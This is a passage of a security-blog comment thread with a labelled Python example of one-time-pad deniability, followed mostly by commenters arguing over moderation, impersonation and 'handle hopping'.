So proved that there was no way that even “backdoors” could give the authorities plaintext, and even under betrayal by one of the corresponding parties the other party could fully deny it.

A little while later a paper showed similar results could be obtained with LLM AI systems. However such a system was not practically usable for obvious reasons.
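The one-time-pad deniability argument in the comment above, worked through as an added example (this is not code from the thread or from anyone quoted in it): for a fixed ciphertext, whoever holds it can derive a pad that "decrypts" it to any same-length plaintext, so the keytext alone proves nothing. The sample messages and the fixed demo pad are constructed for the illustration; the unicity-distance helper uses the usual textbook figure of about 3.2 bits of redundancy per English character.

```python
import math


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings (the whole of a one-time pad)."""
    if len(a) != len(b):
        raise ValueError("pad and message must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def pad_to_length(msg: bytes, length: int) -> bytes:
    """Pad a message with spaces to a standard length, as the comment assumes."""
    if len(msg) > length:
        raise ValueError("message longer than the standard length")
    return msg.ljust(length, b" ")


def otp_encrypt(plaintext: bytes, pad: bytes) -> bytes:
    return xor_bytes(plaintext, pad)


def otp_decrypt(ciphertext: bytes, pad: bytes) -> bytes:
    return xor_bytes(ciphertext, pad)


def forge_pad(ciphertext: bytes, desired_plaintext: bytes) -> bytes:
    """Given only the ciphertext, build a pad that decrypts it to any chosen text.

    Since c = p XOR k, every pair (p', k') with p' XOR k' = c is equally
    consistent with c. The forged pad is indistinguishable from a real one."""
    return xor_bytes(ciphertext, desired_plaintext)


def unicity_distance(key_entropy_bits: float, redundancy_per_char: float = 3.2) -> float:
    """Shannon's unicity distance: characters of ciphertext after which only one
    key is consistent with sensible plaintext. For a one-time pad the key entropy
    grows with the message, so no finite distance is ever reached."""
    if redundancy_per_char <= 0:
        return math.inf
    return key_entropy_bits / redundancy_per_char


def deniability_demo(length: int = 32) -> dict:
    """Encrypt a real message, then show a forged pad yielding an innocent one.

    The pad bytes(range(length)) is a fixed, constructed value for the demo only;
    a real pad must be uniformly random and never reused."""
    real_pad = bytes(range(length))
    real_pt = pad_to_length(b"meet at noon", length)
    ct = otp_encrypt(real_pt, real_pad)
    fake_pt = pad_to_length(b"happy birthday", length)
    fake_pad = forge_pad(ct, fake_pt)
    return {
        "ciphertext": ct,
        "with_real_pad": otp_decrypt(ct, real_pad),
        "with_fake_pad": otp_decrypt(ct, fake_pad),
        "pads_differ": real_pad != fake_pad,
    }
```

A third party handed either pad plus the ciphertext sees a clean decryption each time and has no statistical test that prefers one, which is the "all plaintexts are untrustworthy" point above.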

Winter May 25, 2024 11:07 AM

@All
I get the impression someone got banned from the blog and is now handle hopping. If true, the fact that they continue with the activities that got them banned shows that this action of the moderators was justified.

Anonymous May 25, 2024 12:43 PM

@Moderator

Re:
https://www.schneier.com/blog/archives/2024/05/friday-squid-blogging-emotional-support-squid-2.html/#comment-437328

  1. The censored was quietly posting nothing to do with @echo

The post that was removed veered substantially into the EU AI Act and was largely “off-topic” in the Zero Day thread. The post criticized links to law firm analysis as “foolishly given links to advertorials.”

In fact, there was more criticism directed at legal analysis than there was discussion on Zero Days, or even on the EU AI Act itself, for that matter.

Only one person had recently provided a link to legal analysis on the EU Act: @echo.

@echo’s link, that is still up, is a post that was also republished by NYU Law’s Program on Corporate Compliance and Enforcement Blog.

To claim that “the censored was quietly posting nothing to do with @echo” is at best disingenuous.

At worst, the valuable conversation on AI safety is derailed for conflict’s sake.

Anonymous May 25, 2024 9:43 PM

@Anonymous not at all

@echo reported the now-deleted post to @Moderator with one sentence of their own. There was no “unwarranted ad hominem and vituperative invective filled attack on the poster of the second post in a near demented way.” No overkill was necessary.

Anonymous May 26, 2024 12:15 AM

@Anonymous not at all

I am not aware of the post you are referring to. There was a quite lengthy post with the words ‘rage’ and ‘spittle’. But I forget exactly where it is. Do you have a way to find this?

lurker May 26, 2024 1:36 AM

@whomsoever
“A fifty+ with the bullying behaviour and tantrums of a spoilt brat is not a pretty sight.”

More than one of them blocks the view for the rest of us.

lastoftheV8s May 26, 2024 3:04 AM

@ResearcherZero… I’d like to find out the legalities around the sunset clause regarding said ‘search warrant’. The cynic in me shouts ‘by the way citizen, we (LEA) decide when the sun goes down, you got that?’

Winter May 26, 2024 3:25 AM

@All
Using several handles pretending to be different persons is conclusive evidence of bad faith. Every comment from these entities should be removed irrespective of content.

Comments republishing texts and comments as if they are their originals show bad faith and fraud. These should be removed irrespective of content.

Any comments complaining about @moderator decisions should be deleted on this ground alone.

The recent wave of attacks on @echo and bystanders should all be removed just for these three reasons alone.

My conclusion from these characteristics is that the recent wave of personal attacks by various handles is the work of bad faith entities who try to disrupt this blog site and silence its voices.

We have seen more crude and heavy-handed attacks trying to discredit our host earlier. This might be a second, more subtle attempt.

lastoftheV8s May 26, 2024 3:33 AM

@All I’m assuming there’s a lot of currently practicing/working and former cipher/cryptologist professionals that frequent these forums. Can I ask if any of you know of, are aware of, and have had a crack at this? 👉art installation Kryptos, CIA headquarters👈
If so, would you mind sharing a few good morsels please?
Me personally, I have never heard of it. I came across this dilemma on a fantastic YouTuber’s channel, his handle “LEMMINO” (no affiliation) https://www.lemmi.no/p/the-unbreakable-kryptos-code.

Winter May 26, 2024 3:43 PM

“@Handle Hopper”

There is nobody here using that in the name field and as far as an archive search shows nobody ever has.

That is a convenient shorthand for someone who hides behind so many names to avoid being identified, and then being identified by this behavior.

I normally avoid feeding trolls, but for old times’ sake, I want to advise you to seek professional help, and a life. Both might be difficult where you live, but you can always try.

echo May 26, 2024 6:43 PM

@moderator

Because of the second wave of attacks this week there’s a little mess still left to clean up. Entity is repeating disinformation/personal attacks and adding to workload of moderation, and both prolonging moderation matters and attempting to socialise their actions and cause moderation confusion.

Entity also appears to continue posting using “handle hopping” and posts plausible content in a style resembling a previous high profile person currently holidaying from this blog. Entity has used cut-and-paste content from previous comments by this same person.

https://www.schneier.com/blog/archives/2024/05/friday-squid-blogging-emotional-support-squid-2.html/#comment-437390

Further, they are all to do with @echo’s cyber-stalking, cyber-bullying, and worse things that you have been repeatedly warned of for over half a decade, as can be demonstrated.

https://www.schneier.com/blog/archives/2024/05/friday-squid-blogging-dana-squid-attacking-camera.html/#comment-437353

Winter May 27, 2024 5:13 PM

@Handle Hopper

@Moderator

Why are you bothering the moderator with your whining about me? They have important work to do and should not be distracted with your posturing.

If you have something against me, take it up with me.

If I make an error, say so, then I can learn something. Vague references to past controversies don’t help. But maybe you just want to wallow in other people’s mistakes?

Winter May 27, 2024 5:21 PM

@Channel Hopper

Has @Winter stolen the style of “@-“?

I am happy to give praise where praise is due.

I learned from @- how to notify the moderator in the most efficient manner. I appreciate efficiency and effectiveness and @- was/is a good teacher.

Winter May 28, 2024 3:39 AM

@Handle Hopper

“Committed academic/research fraud”

A lot of posturing again, but we are still waiting for the comment to be pointed out. Or any other of the many cases you claim there are.
